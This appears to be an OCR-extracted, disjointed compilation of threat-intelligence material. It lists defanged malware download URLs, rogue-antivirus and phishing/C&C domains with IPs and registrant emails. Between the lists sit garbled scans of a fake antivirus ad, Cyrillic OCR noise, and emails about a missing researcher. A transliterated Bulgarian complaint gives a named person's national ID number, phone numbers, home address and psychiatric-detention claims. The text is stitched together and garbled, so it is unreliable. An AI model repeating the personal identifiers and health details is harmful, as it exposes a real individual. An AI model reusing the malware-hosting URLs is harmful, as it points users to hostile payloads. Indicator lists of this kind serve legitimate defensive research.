hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://puccienterprises.com/Preview.exe 
hxxp://e-tech.ie/PreviewDoc.exe 
hxxp://e-tech.ie/PreviewDoc.exe 
hxxp://puccienterprises.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
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hxxp://aspiremedstaff.com/Preview.exe 
hxxp://e-tech.ie/PreviewDoc.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/prw/Preview.exe 
hxxp://nutritionprofbob.com/prw/Preview.exe 
hxxp://violinstop.com/Preview.exe 
hxxp://nutritionprofoob.com/prw/Preview.exe 
hxxp://reefglobal.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://easychurchbooks.com/Preview.exe 
hxxp://easychurchbooks.com/Preview.exe 
hxxp://sonorambc.org/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe- 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://emploimed.com/Print _Preview.exe 
hxxp://www.namaskardunia.com/Preview.exe 
hxxp://www.namaskardunia.com/Preview.exe 
hxxp://atlantisprojects.ca/Preview.exe 
hxxp://gilchrist.fl.us/Preview.exe 
hxxp://www.parkisolutions.com/Preview.exe 
hxxp://www.parkisolutions.com/Preview.exe 
hxxp://unitedyfl.com/Print _Preview.exe 
hxxp://unitedyfl.com/Print _Preview.exe 
hxxp://www.parkisolutions.com/Preview.exe 
hxxp://fancydes.webd.pl/Review.exe 
hxxp://rayanat.com/Print _Preview.exe 


hxxp://wholesalebosmereusa.com/Preview.exe 
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hxxp://kohlheatingandair.com/Review.exe 
hxxp://fancydes.webd.pl/Review.exe 
hxxp://rayanat.com/Preview _Print.exe 
hxxp://calacatta.com/Preview.exe 
hxxp://google.com/update.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://www.adventureworldindia.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://globaluxrma.com/Review.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/ReviewPrint.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://shighil.com/ReviewPrint.exe 
hxxp://shighil.com/TerminationRep.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://www.omegasystemsuae.com/Preview.exe 
hxxp://www.omegasystemsuae.com/BKOFR.exe 
hxxp://copyrightlive-uae.com/P64.exe 
hxxp://copyrightlive-uae.com/Print.pdf.exe 
hxxp://copyrightlive-uae.com/P64.exe 
hxxp://coffschamber.com.au/Review.exe 
hxxp://coffschamber.com.au/Review.exe 
hxxp://coffschamber.com.au/Review.exe 
hxxp://cdn-102.anonfiles.com/XdzdPbVf08/a6501123-1600284832/Review.exe 
hxxp://cdn-102.anonfiles.com/XdzdPbVf08/a6501123-1600284832/Review.exe 
hxxp://cdn-33.anonfiles.com/L30eQ0Vbo02/d37ab69a-1600287659/Preview.exe 
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hxxp://emploimed.com/Preview.exe 
hxxp://cdn-33.anonfiles.com/L30eQ0Vbo02/d37ab69a-1600287659/Preview.exe 


hxxp://portableapps.com/downloading/?a=TeamViewerPortable &n=TeamViewer %20Portable 
&s=s &p= &d=pa &f=TeamViewerPortable _15.9.4.paf.exe 


hxxp://www.omegasystemsuae.com/BKOFR.exe 
hxxp://www.delwarren.com/backup/nowin.exe 
hxxp://wikiapply.ir/Scrip.exe 
hxxp://shighil.com/Scrit.exe 
hxxp://shighil.com/Scrip.exe 
hxxp://shighil.com/Print.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://cdn-114.anonfiles.com/ZfSf52X20c/76279be8-1600685243/mor125.exe 
hxxp://dubaidreamsadventure.com/Print _Review.exe 
hxxp://107.155.137.21/https x64.exe 
hxxp://stahlworks.com/dev/unzip.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/htp _x64.exe 
hxxp://94.140.115.219/doc/htp _x86.exe 
hxxp://94.140.115.219/1/http64.exe 
hxxp://94.140.115.219/1/P32.exe 
hxxp://94.140.115.219/1/P64.exe 
hxxp://94.140.115.219/1/runl.exe 
hxxp://94.140.115.219/1/run2.exe 
hxxp://94.140.115.219/1/service http64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/htp _x64.exe 
hxxp://94.140.115.219/doc/htp _x86.exe 
hxxp://94.140.115.219/1/http64.exe 
hxxp://94.140.115.219/1/P32.exe 
hxxp://94.140.115.219/1/P64.exe 
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hxxp://94.140.115.219/1/runl.exe 
hxxp://94.140.115.219/1/run2.exe 
hxxp://94.140.115.219/1/service http64.exe 
hxxp://94.140.115.219/crypt/3/http 8080 x64.exe 
hxxp://94.140.115.219/crypt/3/http64.exe 
hxxp://94.140.115.219/crypt/3/https 8443 x64.exe 
hxxp://94.140.115.219/crypt/3/P64.exe 
hxxp://94.140.115.219/crypt/3/run2.exe 
hxxp://94.140.115.219/crypt/3/runl.exe 
hxxp://94.140.115.219/crypt/3/https _8443.exe 
hxxp://94.140.115.219/crypt/3/http8080.exe 
hxxp://94.140.115.219/crypt/3/http 8080 x64.exe 
hxxp://94.140.115.219/crypt/3/http64.exe 
hxxp://94.140.115.219/crypt/3/https 8443 x64.exe 
hxxp://94.140.115.219/crypt/3/P64.exe 
hxxp://94.140.115.219/crypt/3/run2.exe 
hxxp://94.140.115.219/crypt/3/runl.exe 
hxxp://94.140.115.219/crypt/3/https _8443.exe 
hxxp://94.140.115.219/crypt/3/http8080.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/1.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/2.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/3.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
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hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 


hxxp://94.140.115.219/3/http 8080 x64.exe 


hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 


hxxp://94.140.115.219/3/https 8443 x64.exe 


hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
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hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 

Stay tuned! 


1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEgxaFmh6ff£MPKxa_mKE91Qqa_qVGW1C_N_J5ah71Pc8b_1U1 
8t67kDuYhG7n JmA9kV3wkKxUmulEAKto-Lppn682t4aheuETkY61d8 
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REMOVES: 


S) °° ROTECTOR 


- 
pone 2 


WHAT IS SYSTEM PROTECTOR? 


System Protector ts Your Best Anti-Virus Protection PRESS ABOUT SYSTEM PROTECTOR 


Spyware, trojans. worms. and phesheng attacks are all on the nse. malware 

writers are actively evolving thew Code m atterrets to evade security System Protector offers basic, thought very 
Gelenses. That's why @ 1 of vital enportance to have a rehable and up to date fective parertal Controls uteque arh-spyware 
Gelense agaist vruses tropars and other forms of mabware And that’s when Ulaty and 1s the top anh spyware securty sute 
System Protector goes into achon, because System Protector is an ultra you can buy 
eGoert PC protection under mewnal resources expenditure © will protect 

you fon wruses. worms, spyware, and al Intemet threats at the same tne 

Saving resources and engraving your Computer's speed 


SC Magazine 


System Protector is nommnated for PC Worlds 
100 Best Products of 2006 for setting the 
Standard for excellence in the [T and consumer 
electromcs Mausines 


MAIN FEATURES PO News 


The CNET heghly appreciated us saying “System 
Protector has good product Geaagn, perlormance 
and quality that makes thes antiwrus sute weil 
worth the pnce 


© System Protecter scars your computer fer vruses and reperts findings that 
are easy to 1036 and understand 


© System Protectce prowdes a macomun protection wth no slow Gown of 
your PC Softpedia Review awarded System Protector 
ts Editors’ Chace award acd geve fwe cof of 
frve stars 
© Actornatx ally termmates Indden vruses and spyware 


© Prevents keyloggers forn steakng you personal data 


@ Unbke other ant:wruses System Protector scans compressed Hes( mp 
rat) 


© Scan removable dewces(CD's, DVD's, external drives, USB dewces 


& Prrewtes wei woth the ateity tn Arana ant etal fee urvtates 


antimalware-scannerv2 .com (78.46.88.202) - AS16265 LeaseWeb AS Amsterdam, Nether- 
lands Email: basni@lewispr.com 

onlinevirusbusterv2 .com 

xpvirusprotection2009 .com 

total-malwareprotection .com 

total-virusprotection .com 

xpvirusprotection .com 

bestbillingpro .com 

truconv .com 


safeinternettoolvl .com (212.117.165.126; 38.99.170.9; 69.4.230.204; 78.47.91.153) 
- AS36351 SOFTLAYER Technologies Inc; AS24940 HETZNER-AS Hetzner Online AG RZ- 
Nuernberg; AS44042 ROOT-AS root eSolutions; AS174 COGENT /PSI Email: info@dmf.com.tr 
antivirusquickscanv1 .com 

computerscanv1 .com 

antivirusbestscannervl1 .com 

antiviruslivescanv3 .com 

proantivirusscanv3 .com 

fullantispywarescan .com 

webscannertools .com 

approved-payments .com 
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[5]https://unit-123.org/wp-content/uploads/2022/06/Iran Hackers Personal _Web _ Sites 
_Repository.rar 


[6]https://unit-123.org/wp-content/uploads/2022/06/Iran Hackers Personal _Web Sites 
_Repository Ol1.rar 


[7 ]https://unit-123.org/wp-content/uploads/2022/06/Dancho Danchev Analysis Report Iran 
_Hacking Scene.rar 


[8]https://unit-123.org/wp-content/uploads/2022/06/Dancho Danchev Cyber Threat Actors 
_Analysis _2021-2.pdf 


[9]https://unit-123.org/wp-content/uploads/2022/06/cyber-intelligence _611b8774.pdf 


Sample screenshots and photos: 


[10] 


[11] 
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- TotalVirusProtection 


Malware Security Scanner 


The TotalVirusProtection can resolve the 
following problems 


ays Coat program ts munomancay upduced We have 
ts, working hard on this product To 


ms-scan .org 9 (84.19.184.160) - AS31103 KEYWEB-AS' Keyweb AG, _-— Email: 
strider.glider@gmail.com 

system-protector .org 

system-protector .net 

av-lookup .com 

ms-scan .info 

srv-scan .us 

ms-scan .net 

ms-scan .biz 

srv-scan .biz 


bitcoreguard .net (72.232.187.197) AS22576 LAYEREDTECH Layered Technologies, Email: 


cbristed1996@gmail.com 
bitcoreguard .com 
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- ganev 
- dava pari 


- dwama nepoznati 
- -vlige na policeiska tehnika 
= dwama nepoznati 
- -ediniq go chaka 


V godinata, nepoznato psihichno bolno lice nahluva v kushtata mi I mi vadi dokumenti s drugo 
nepoznato lice koeto sushto e nahlulo v kushtata mi I go chaka na stulbite. Na sledvashtiq den 
policeiski, slujeteli, nahluvat, v, staqta, v koqto, spq, I bez, da, mi, davat, obqsnqnie, me, 
nakarvat, da, se, obleka, sled koeto, mi, pokazvat, kopie, ot lichna, karta, koqto, ne, sum, 
predostavql, I me otvejdat, s, nepoznata, kola, parkirana, pred, kushtata, kum, neizqsnena, 
posoka, kato, po, putq, prepisvat, gorivoto, za, prevoza, na, firmata, v koqto, raboti, moqta, 
maika, firma, Lesoplast, sled, koeto, me, otvejdat, v, psihiatrichno, zavedenie, grad, Lovech, 
sled, koeto, me, zavejdat, v, karcer, I, sled, koeto, bez, da, mi, bude, davano, obqsnenie, 
zapochvat, da, mi, slagat, injekcii, s, kopleksol, bez, da, mi, bude, davano, obqsnenie, za, 
zadurjeneto, mi. Sushtata, vecher, v karcera, vuvejdat, drugo, lice, izvestno, kato, Kamen Tzura 
grad, Troyan, sled, koeto, sled, molba, bivam, izvejdan, navun I prekarvam, noshta, na, leglo, 
ostaveno, v, koridora. Sushtoto, lice, napuska, psihiatrichnoto, zavedenie, bez, da, dava, 
obqsneniq, kato, prez, cqloto, vreme, ne, mi, e, davano, obqsnenie, za, zadurjaneto, mi. 


V godinata, 2011, lice, predstavqshto, se, za, Dobrin, Danchev, poseshtava, doma, mi, zaedno, 
sus, jena, sushtata, vecher, sled, povrushtane, razbiram, za, otrovena hrana, sled, koeto, 
posledvashtite, halucinacii, me, dovejdat, da, se, otstrang, ot, vunshni, contacti, koeto, ne, me, 
spira, da, produlja, mogta, rabota, v, sferata, na, komputerna, sigurnost. 


V godinata 2012, sled, poseshtenie, v, hotel, Sheraton, grad, Sofia, razbiram, che, otnovo, sum, 
upotrebil, otrovena, hrana, sled, posledvashtite, kontaki, se, otranqvam, ot, vunshni, contact, 
koeto, ne, me, spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnost. 


V godinata 2012, sled, poseshtenie, v, hotel, Hilton, grad, Sofia, otnovo, razbiram, che, sum, 
upotrebil, otrovena, hrana, sled, posledvashtite, kontaki, otnovo, se, otrstranqvam, ot, vunshni 
contacti, koeto, ne, me, spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnos! 


V godinata, 2014, sled, nanasqne, v hotel, Florimont, grad, Sofia, otnovo, razbiram, che, sum, 
upotrebil, natrovena, hrana I sled, prenoshtuvane, na, syntrinta, se, sabujdam, s, halucinacii, I 
sled, posledvashtite, kontaki, otnovo, se, otstranqvam, ot, vunshni, kontakti, koeto, ne, me, 
spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnost. 


V godinata 2018 nepoznato lice predstavqshto se za Vasil Stanev ot Dans me posheshtava za da 
mi prediaga rabota I da me kara da hodq na doktor. 


Kato, svetoven, specialist, v, sferata, na, komputerna, sigurnost, az, produljavam, moqta, 
rabota, v, sferata, na, komputerna, sigurnost i bih, jelal, da, buda, privikan, za, izqsnqvane, na, 
obstogtelstva I da, razbera, dali, ne sum, tyrsen, za, izqsnqvane, na, obstogtelstva. 


Blagodarq, za, vasheto, vnimanie, I shte, ochakvam, da, buda, privikan, za, izqsnqvane, na, 
obstoqtelstva, I da, razbera, dali, ne, sum, tyrsen, za, izqsnqvane, na obstoqgtelstva. 


rp. Tposx 
08.08.2016 


Hi Dancho. 


Are you alive? : 
I just got this email. 


Best regards, 

Dmitry Bestuzhev 

Senior Regional Researcher, Latin America 
Global Research and Analysis Team 
Kaspersky Lab 

Key ID: 4096/0xE4D1B9CE 
http://vwww.kaspersky.com 
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Jianyo Jlanyes e Ha 26 rOHHH, MexKTYHapOHO NpH3HaT eKcnepT 
mlo KHOepcurypHocT. Toi nume 3a cneluatH3sHpaHHa Onor Zero 
Day, 4acT OT HOBHHapcKaTa Mpexa Zdnet.com. IIpes centemBpu 
2010 r. Jlanyo Jlanyes H34e3Ba H OTTOraBa He OTTOBapA Ha CBOHTE 
KoopauHatTu. TocneqHatTa My AKTHBHOCT B Twitter e OT OKTOMBDH. 
OT BbhTpeIIHOTO MHHHCTepCcTBO KOMeHTHpart, Ye JjaHyo Jjanues 
qocera He e 6171 OOABABAaH 3a H34e3HA OT CBOHTe ONH3KH. 
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Hey Sancho, 

A bet of folks are wondering where you're at and to see if you're Ot. I had » call from your colleagues ot DOtet this eorning and they're worried to since they heven’t Beard from you since October. 
Let me know Sf things are Ox. 

Cheers, 


Guiter 


Hi there! 


You’re being suspicious by your absence. 
Just wondered where you’ve got too. 


All the best, 
Chris. 
[15] 
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Kazvam se Dancho Danchev svetoven specialist v sferata na borbata s 
kiber prestupnosta dete sum s EGN: 8311226968 I mobilen telefon 
+35987689389@ ot Troyan I mobilen telefon na moqta maika - +359886124919 
I dnes reshih da podam signal otnosno sebe si I nezakonen nasilstven moi 
arest ot slujiteli na RPU Troyan v godinata 201@ s kradeni moi documenti 
koito prosto trqbvalo da predstavq I sus shteti v razmer na 85,000 leva 
or tormoz I lipsa na pravorazdavane I eventualen opit za otvlichane or 
mogta kushta v godinata 201@ ot sushtite slujiteli bez svideteli I bez 
pravorazdavane or strana na durjavata s cel da buda poseten ili privikan 
i da buda razpitan ot vashi slujiteli spored ugovorka Ili na mqsto na 
moi postoqnen adres koito e Dimiter Ikonomov 34 Street, Troyan, Bulgaria 
i dnes reshih da podam signal otnosno nezakonen arest otnasqsht se do 
men i posledvashta krajba i eventualno upoqvane na moi adres bez moe 
znanie s cel da buda poseten ili da buda privikan za izqsnqvane na 
obstoqtelstva. 


V godinata 2@1@ nepoznato psihiatrichno bolno lice nahluva v kushtata v 
kogto jiveq i mi vadi documenti s drugo lice koeto go chaka na stulbite 
v kushti s ideqta da se vidim. Na sledvashtiq den policeiski sluhiteli 
ot RPU Troyan nahluvat v staqta v koqto jiveq i me izdurpvat nasila bez 
svideteli i mi pokazvat kopie na lichnata mi karta koeto ne sum 
predostavql i me vodqt s kola v neizqsnena posoka bez da e davane 
obqsnenie za zadurjaneto mi. Po putq pishat gorivoto na kolata s koqto 
sme na firma Lesoplast kogeto e firmata na maika mi i bashta mi kudeto 
te sa bili slujiteli predi godini sled koeto me otvqjdat v neizqsnena 
posoka v sgrada v grad Lovech i me vodqt pri chovek koito ne poznavam i 
stoim i ne mi se dava obqsnenie za zadurjaneto mi sled koeto ne karat da 
si pokaja lichnata karta pred moite roditeli i da se podpisha i me 
zakluchvat v karcer v sgradata za period ot nqkolko meseca kato mi 
zakluchvat documentite i telefona i mi vzimat wryzkite na obuvkite i 
kolana bez da mi e davano obqsnenie za zadurjaneto mi. 


Prikachvam jalba koqto sum zapochnal da pisha v godinata 2016 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 
e arestuval nezakonno i me e izdurpal ot u nas s otkradnati documenti 
nasila i bez svidelite v godinat-a 2@1@ kato dnes sme 2@21. 
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Prikachvam jalba koqto sum zapochnal da pisha v godinata 2016 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 
e arestuval nezakonno i me e izdurpal ot u nas s otkradnati documenti 
nasila i bez svidelite v godinat-a 2@01@ kato dnes sme 2021. 


Predpochitam da potursite maika mi po telefona zashtoto kato che li ne 
moga da prikazvam i neznam kakva e prichinata. 


Blagodarg. 


Dancho 
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coreguard2009 .com (78.46.151.181) - AS24940 HETZNER-AS Hetzner Online AG RZ-Nuernberg 
Email: iversbradly72@gmail.com 

coreguard2009 .biz 

coreguard2009 .net 


coreguardlab2009 .biz (95.211.14.161) - AS16265 LeaseWeb AS Amsterdam, Netherlands, 
Email: stivpanama@gmail.com 

coreguardlab2009 .net 

coreguardlab2009 .com 


guardiab .com (72.232.187.198) - AS22576 LAYEREDTECH Layered Technologies Email: 
alexvasiliev1987@cocainmail.com 
guardav .com 


guardiab2009 _ .biz (76.76.103.164) - AS21548 MTO Telecom Inc. Email: stiv- 
panama@gmail.com 

guardiab2009 .net 

guardlab2009 .com 
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Related malicious and fraudulent domains known to have been involved in the campaign: 
hxxp://abs.twitter.com.webapp.workbench.run 
hxxp://abv.bg.login-site.online 
hxxp://accounts-updates.club 
hxxp://accounts.ukr.net.checklogin.foapp.info 
hxxp://accounts.ukr.net.checklogin.updatenote.net 
hxxp://accounts.ukr.net.checklogin.userarea.click 
hxxp://accounts.ukr.net.fbapp.info 
hxxp://accounts.ukr.net.updatenote.net 
hxxp://accounts.ukr.net.userarea.click 
22393 


hxxp://algemene-controle.online 
hxxp://beststreammusic.com 
hxxp://bg.fbapp.info 
hxxp://bg.login-site.online 
hxxp://bg.userarea.click 
hxxp://center.cmdswitch.xyz 
hxxp://checklogin.login-site.online 
hxxp://cn.beststreammusic.com 
hxxp://com.webapp.workbench.run 
hxxp://cpanel.fairfieldsch.org 
hxxp://dns.thehomeofbaseball.com 
hxxp://e.mail.ru.settings.foapp.info 
hxxp://escochartzone.com 
hxxp://facebook.com.webapp.workbench.run 
hxxp://fastfilmsbucket.com 
hxxp://fbapp.info 
hxxp://fontdrvstore.com 
hxxp://free24player.com 
hxxp://georgia-travel.org 
hxxp://google-account-settings.spdup.art 
hxxp://google-moogle.spdup. info 
hxxp://google-settingsapi.fbapp.link 
hxxp://hostmaster.fbapp.info 
hxxp://hostmaster.jazzradiostream.com 
hxxp://hs126.tamsimail.com 
hxxp://hs157.tamsimail.com 
hxxp://jazzradiostream.com 
hxxp://laerka.supplrald.com 
hxxp://liveserviceonedrive.com 
hxxp://login-site.online 
hxxp://login-yahoo.fbapp.link 
hxxp://loungecinemaclub.com 
hxxp://luxefighting.net 
hxxp://m.facebook.com.webapp.workbench.run 
hxxp://mail.algemene-controle.online 
22394 


hxxp://mail.bg.fbapp.info 
hxxp://mail.bg.login-site.online 
hxxp://mail.bg.login.photography 
hxxp://mail.bg.userarea.click 
hxxp://mail.eservicesystems.net 
hxxp://mail.fairfieldsch.org 
hxxp://mail.linuxkrnl.net 
hxxp://mail.liveserviceonedrive.com 
hxxp://mail.regvirt.com 
hxxp://mail.suncommunications.org 
hxxp://mail.topcinemaclub.com 
hxxp://mckinseyandco.com 
hxxp://mimecastverified.com 
hxxp://moderntips.org 
hxxp://mta-s1-151.tamsimail.com 
hxxp://mta20.r1.tamsimail.com 
hxxp://mta301.tamsimail.com 
hxxp://mta303.tamsimail.com 
hxxp://mta32a.tamsimail.com 
hxxp://mta337.tamsimail.com 
hxxp://mta440.tamsimail.com 
hxxp://mta447.tamsimail.com 
hxxp://mta624.tamsimail.com 
hxxp://mta676.tamsimail.com 
hxxp://mta678.tamsimail.com 
hxxp://mta698.tamsimail.com 
hxxp://mta770.tamsimail.com 
hxxp://mta873.tamsimail.com 
hxxp://mta884.tamsimail.com 
hxxp://mta891.tamsimail.com 
hxxp://mta900.tamsimail.com 
hxxp://mta913.tamsimail.com 
hxxp://mta925.tamsimail.com 
hxxp://mta929.tamsimail.com 


hxxp://mta932.tamsimail.com 
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hxxp://my-photo-service.com 
hxxp://my.idnn.asia 
hxxp://myaccount.click 
hxxp://narrowpass.net 
hxxp://networkcentrals.com 
hxxp://nmail.regvirt.com 
hxxp://noadsplayer.com 
hxxp://ns1.checklogin.in 
hxxp://ns1.treepastwillingmoment.com 
hxxp://ns2.checklogin.in 
hxxp://ns2.treepastwillingmoment.com 
hxxp://ns2.userzone.one 
hxxp://ovhsec.com 
hxxp://passengerco.com 
hxxp://passport.abv.bg.fbapp.info 
hxxp://passport.abv.bg.userarea.click 
hxxp://photosyncdrive.com 
hxxp://politicweekend.com 
hxxp://poolpartyrecords.com 
hxxp://protonhardstorage.com 
hxxp://redsample.net 
hxxp://regvirt.com 
hxxp://relay.soft-storage.com 
hxxp://remotepx.net 
hxxp://renodesmart.com 
hxxp://sarmsoftware.com 
hxxp://securitylogagent.com 
hxxp://server31743.com 
hxxp://smtp.truefashionnews.com 
hxxp://sportever.org 
hxxp://static.facebook.com.webapp.workbench.run 
hxxp://store.soligro.com 
hxxp://support-cloud.life 
hxxp://syslog.acledit.com 


hxxp://thissubdomainshouldonlyresolveifwildcard.liveserviceonedrive.com 
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hxxp://time-2t-time.com 
hxxp://timezone0.com 
hxxp://travelerupdate.com 
hxxp://truefashionnews.com 
hxxp://twitter.com.checklogin.in 
hxxp://twitter.com.webapp.memcached.in 
hxxp://ukr.net.foapp.info 
hxxp://utc2Itc.com 
hxxp://webapp.workbench.run 
hxxp://webdisk.fairfieldsch.org 
hxxp://webmail.fairfieldsch.org 
hxxp://wgzhk.dns15.bid 
hxxp://worldimagebucket.com 
hxxp://wp.soligro.com 
hxxp://ww1.fbapp.info 
hxxp://ww12.fbapp.info 
hxxp://ww25.fbapp.info 
hxxp://ww43.fbapp.info 
hxxp://activityduringhistoricaloffice.com 
hxxp://adobeincorp.com 
hxxp://aeroservicemax.com 
hxxp://akamaisoftupdate.com 
hxxp://akulaku.tutooliv.club 
hxxp://algemene-controle.online 
hxxp://bbcweather.org 
hxxp://beststreammusic.com 
hxxp://checkmalware.info 
hxxp://daysheduler.org 
hxxp://escochartzone.com 
hxxp://facebook.com.webapp.workbench.run 
hxxp://fairfieldsch.org 
hxxp://faststoragefiles.org 
hxxp://foapp.info 
hxxp://fundseats.com 
hxxp://globaltechengineers.org 
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hxxp://hostapp.link 
hxxp://iboxmit.com 
hxxp://liveserviceonedrive.com 
hxxp://mdcrewonline.com 
hxxp://moldtravelgroup.com 
hxxp://narrowpass.net 
hxxp://nethostnet.com 
hxxp://networkcentrals.com 
hxxp://newstyleradio.net 
hxxp://ovhsec.com 
hxxp://photosyncdrive.com 
hxxp://politicweekend.com 
hxxp://powernoderesources.com 
hxxp://regvirt.com 
hxxp://sarmsoftware.com 
hxxp://scalingreserve.com 
hxxp://truefashionnews.com 
hxxp://updatesystems.net 
hxxp://urlweb.dslbd.xyz 
hxxp://userarea.click 
hxxp://userarea.top 
hxxp://userzone.one 
hxxp://virm.xtrmp3.site 
hxxp://virtsvc.com 
hxxp://webcache.one 
hxxp://workbench.run 
hxxp://worldimagebucket.com 
hxxp://x-tools.tech 
hxxp://wwwco4testmcsoft.com 
hxxp://zeroslitecarb.com 
hxxp://zfmcg.dns15.bid 
Sample screenshots of known C &C (Command and Control) domains: 
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Nigreerctpyeu Bac Ha calite nocemupeercay pamnero pone Kaptesaw nm otypetea! Y nae © 
Aree OCT. RATION Garth Kn foGho Tewatery « meGoto paaMepA OT CAME MAnONIOE, fo 
canteen Gomes! 


C tease HaWeTO Calta Ge 6 AR Wen CcenTe OTNDAEHT ADYTY NOASDARNeHR © mHQe 
apaceeod aenanpred olactin mSo me He eeHee EpACcuBON Clatmeoh enptreat 


6 Gave nawero calito namngetCn magTeea NoAgpERNeHER NoeTH AAR MOGOPS NpaAmpema. OT AHR 
Dem AO AYR NACE E ) 


Tenepe Hemmoro npoGesnaece no paagenas caltta. Bcero 6 Gase 11 Goran paquenos, sotopee 
